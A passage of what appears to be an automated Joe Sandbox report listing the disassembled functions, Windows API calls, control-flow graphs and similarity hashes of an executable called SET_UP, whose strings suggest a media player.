                                                                                                                                                                                                  • SetWindowsHookExW.USER32(000000FF,V,00000000,00000000), ref: 004B60E3
                                                                                                                                                                                                    • Part of subcall function 004C663D: __EH_prolog.LIBCMT ref: 004C6642
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentH_prologHookThreadWindows
                                                                                                                                                                                                  • String ID: V
                                                                                                                                                                                                  • API String ID: 2183259885-315977766
                                                                                                                                                                                                  • Opcode ID: 23d3b9e54676f83996ed479c1e5621e3b37fabd677f4a37a95da457c1b9251ed
                                                                                                                                                                                                  • Instruction ID: 483421226c42cd39331651724eb57accc4a0929dd275def252d498380281669c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23d3b9e54676f83996ed479c1e5621e3b37fabd677f4a37a95da457c1b9251ed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F0E5359002546BD7A03BB5AA1EF4E3AE0AF40758F12076FF452461E2DB6C9C818B7D
                                                                                                                                                                                                  Function 004C4D62 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 402 4c4d62-4c4d6c 403 4c4d6e-4c4d7a call 4c4d1c 402->403 404 4c4db4-4c4dc3 GetPrivateProfileIntW 402->404 408 4c4d7c-4c4d7f 403->408 409 4c4d81-4c4dad RegQueryValueExW RegCloseKey 403->409 406 4c4dc9-4c4dcb 404->406 408->406 409->408 410 4c4daf-4c4db2 409->410 410->406
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,?,00000000,?,?,?,00000001,?,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000), ref: 004C4D9B
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000,?), ref: 004C4DA4
                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,00000000,?), ref: 004C4DC3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClosePrivateProfileQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1423431592-0
                                                                                                                                                                                                  • Opcode ID: 38f8383a8a9d03accd2a64d70832a72db64547696999f9c0d3a20f49f279e6e7
                                                                                                                                                                                                  • Instruction ID: d6eda2c40e48f856a27438315e8cedb68e843239a128d19e8e4793b8995be007
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38f8383a8a9d03accd2a64d70832a72db64547696999f9c0d3a20f49f279e6e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0901697A000118FBCB52AF91CD08FEE3BB8EF84754F14806AF9069A220D775DA119B98
                                                                                                                                                                                                  Function 0040E4C9 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 411 40e4c9-40e50c __EH_prolog 413 40e51b-40e51d 411->413 414 40e50e-40e519 SHGetMalloc 411->414 415 40e521-40e539 413->415 414->415 416 40e548-40e54a 415->416 417 40e53b-40e546 SHGetDesktopFolder 415->417 418 40e54e-40e562 416->418 417->418
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040E4EE
                                                                                                                                                                                                  • SHGetMalloc.SHELL32(005091E4), ref: 0040E513
                                                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(005091E0,?,?,?,0040E4C4), ref: 0040E540
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DesktopFolderH_prologMalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1185184967-0
                                                                                                                                                                                                  • Opcode ID: 7c6774bf56f55644354cec19d0202667bb12322a91eee66d1bd5cc16f86ffcdb
                                                                                                                                                                                                  • Instruction ID: acb4fdbae04ce6963c1efbc4ad10392ea740e61a453946996517807afc7a703e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c6774bf56f55644354cec19d0202667bb12322a91eee66d1bd5cc16f86ffcdb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58011270A01205EFD714CF95D909BADBBB4FB44308F10486FE802E7391E7789A04DB55
                                                                                                                                                                                                  Function 004C4D1C Relevance: 3.0, APIs: 2, Instructions: 33registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegOpenKeyExW.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4CB6
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CD9
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CF8
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCloseKey.KERNEL32(?,?,?,00508FBC,AppFolder,00000000), ref: 004C4D08
                                                                                                                                                                                                    • Part of subcall function 004C4C88: RegCloseKey.ADVAPI32(00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4D12
                                                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,0002001F,00000000,?,00000000,00000000,?,?,?,?,004C4DF9,?), ref: 004C4D4C
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,004C4DF9,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4D53
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreate$Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1740278721-0
                                                                                                                                                                                                  • Opcode ID: c2e5d141f4b703238b6c40c8fda7588562b6c597f8b38eec626e6eb66be04ca5
                                                                                                                                                                                                  • Instruction ID: fd1377667621bea06dfd21276b55ea688d95ce3a24ee0253d493979c4ed27f4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2e5d141f4b703238b6c40c8fda7588562b6c597f8b38eec626e6eb66be04ca5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEE0397A501138BB8761AB96DD49DEFBE7CEA8ABA0700042AF60692110D6B49A0196F5
                                                                                                                                                                                                  Function 004C739C Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,004B9162,00000000,00000000,00000000,00000000,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000,0049689D), ref: 004C73A5
                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000,0049689D,00000000), ref: 004C73AC
                                                                                                                                                                                                    • Part of subcall function 004C73FF: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 004C7430
                                                                                                                                                                                                    • Part of subcall function 004C73FF: lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004C74D1
                                                                                                                                                                                                    • Part of subcall function 004C73FF: lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 004C7500
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3389432936-0
                                                                                                                                                                                                  • Opcode ID: 02f85a12755a416dc85cb58aca855219e64937adaae4eea7fcb4734b39baf815
                                                                                                                                                                                                  • Instruction ID: 8af0d8b2e8d8073a4d3aa4f2aeae798fb02dcbef2405be9052260aa62c299d9c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02f85a12755a416dc85cb58aca855219e64937adaae4eea7fcb4734b39baf815
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCF037789082558FC794EF25D554F097BE8AF84754F05848FF8449B3A2CB78E844CF6A
                                                                                                                                                                                                  Function 0049CB65 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,0049681C,00000001), ref: 0049CB76
                                                                                                                                                                                                    • Part of subcall function 0049CA1D: GetVersionExA.KERNEL32 ref: 0049CA3C
                                                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 0049CBB5
                                                                                                                                                                                                    • Part of subcall function 0049E08E: HeapAlloc.KERNEL32(00000000,00000140,0049CB9E,000003F8), ref: 0049E09B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2507506473-0
                                                                                                                                                                                                  • Opcode ID: d03763853755309f0d979c1ccac85f62b1189c4e93f3f343c03d8149be08113e
                                                                                                                                                                                                  • Instruction ID: b9edfe78dae0fa3f6f93bab27f37ec7c79e0b6b211da0e9eb466344dd15e5612
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d03763853755309f0d979c1ccac85f62b1189c4e93f3f343c03d8149be08113e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4F065715112019EFF6057327CC7B2A3DD0DB10795F14443BF801C81A0EB689581AA1A
                                                                                                                                                                                                  Function 004976BB Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,004A9904,?,00000000,00000000,004A9913,004A9913), ref: 004977A2
                                                                                                                                                                                                    • Part of subcall function 0049D76C: InitializeCriticalSection.KERNEL32(00000000,?,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7A9
                                                                                                                                                                                                    • Part of subcall function 0049D76C: EnterCriticalSection.KERNEL32(00000010,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7C4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1616793339-0
                                                                                                                                                                                                  • Opcode ID: 8cfece397398f5776d33151e9be530b641715a4dc6b8d27c9a0ee179655a1170
                                                                                                                                                                                                  • Instruction ID: 548e3b7e72a1138b5e9d1c2b891fa814a6e6cdaebae99fe7ff0fd23a6f1b2147
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cfece397398f5776d33151e9be530b641715a4dc6b8d27c9a0ee179655a1170
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED21F932A14204ABDF10EBA5DC82B9E7F64EB00724F204577F420EB2D0D37CB9418B58
                                                                                                                                                                                                  Function 0041D3FD Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000000E,?), ref: 0041D431
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FolderPathSpecial
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 994120019-0
                                                                                                                                                                                                  • Opcode ID: 7742ca1b486bdb4c1cd171e8c9213271b72619ced26e87ec3fd433ed33ddbeb0
                                                                                                                                                                                                  • Instruction ID: 3da9f04a560dc41ff8ae94c2b426a7643f5e2dfca03e099d056c50adbb0303af
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7742ca1b486bdb4c1cd171e8c9213271b72619ced26e87ec3fd433ed33ddbeb0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F0307954010CBADB50DB69C9059D977B9BF88304F00C4B5AA45E7250EA70DA498B94
                                                                                                                                                                                                  Function 004011CF Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041D612: GetVersionExW.KERNEL32(?), ref: 0041D641
                                                                                                                                                                                                    • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 00401248
                                                                                                                                                                                                    • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 0040125E
                                                                                                                                                                                                    • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 0040127B
                                                                                                                                                                                                    • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 0040129F
                                                                                                                                                                                                  • LoadCursorW.USER32(?,00000191), ref: 004011F6
                                                                                                                                                                                                    • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000002,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B570
                                                                                                                                                                                                    • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000001,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B583
                                                                                                                                                                                                    • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000002,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B59B
                                                                                                                                                                                                    • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000001,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B5AE
                                                                                                                                                                                                    • Part of subcall function 0041B548: RegCloseKey.ADVAPI32(00000000), ref: 0041B5B7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFontIndirectOpen$CloseCursorLoadVersion
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2066343201-0
                                                                                                                                                                                                  • Opcode ID: 6deafe14b66c3201bfd27c25bcdf2a85c71b4f70a7ed8c39d5a3523501557c9e
                                                                                                                                                                                                  • Instruction ID: 1489ab88cfe35b16de277f1d76f294b492afb8cf12f90218ac6a76f2e13026ca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6deafe14b66c3201bfd27c25bcdf2a85c71b4f70a7ed8c39d5a3523501557c9e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E0CD71A0071057C751FBB1A4169CD33D46F44318701486FF056D7291DF7C98404788

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 00404DA7 Relevance: 55.3, APIs: 17, Strings: 14, Instructions: 1092COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00404DAC
                                                                                                                                                                                                    • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FF00FF,00000084,?), ref: 00404E2D
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000CA), ref: 004053A3
                                                                                                                                                                                                    • Part of subcall function 004B0798: SendMessageW.USER32(?,00000432,00000000,?), ref: 004B07DB
                                                                                                                                                                                                    • Part of subcall function 0041787A: ImageList_GetImageInfo.COMCTL32(?,00000000,?), ref: 004178A9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Image$List_$Masked$CreateH_prologInfoMessageSend
                                                                                                                                                                                                  • String ID: $<L$<L$Fit Window/Original size$Full screen (Alt+Enter)$Go to display view (F6)$Mute/Unmute (F8)$Next (Ctrl+F)$Play/Pause (Ctrl+P)$Previous (Ctrl+B)$Stop (Ctrl+S)$Toggle between elapsed and remaining time$VGL$Volume
                                                                                                                                                                                                  • API String ID: 1830684457-1735526441
